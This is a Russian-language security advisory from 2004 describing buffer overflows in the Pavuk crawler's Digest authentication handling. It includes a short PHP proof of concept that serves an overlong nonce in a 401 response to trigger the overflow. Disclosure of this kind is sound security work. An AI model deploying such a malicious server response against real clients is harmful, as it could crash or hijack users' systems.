Дата публикации: | 29.07.2004 |
Всего просмотров: | 1802 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Pavuk
Описание: Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf(). Пример/Эксплоит: <?php $buffer = ""; for ($i = 0; $i < 1024; $i++) { $buffer .= "A"; } header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\" opaque=\"opaque\" nonce=\"$buffer\""); header("Status: 401 Not Authorized"); ?> URL производителя: http://pavuk.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Уязвимость устранена для некоторых Linux дистрибутивов. |
|
Ссылки: | [Full-Disclosure] Pavuk Digest Authentication Buffer Overflow |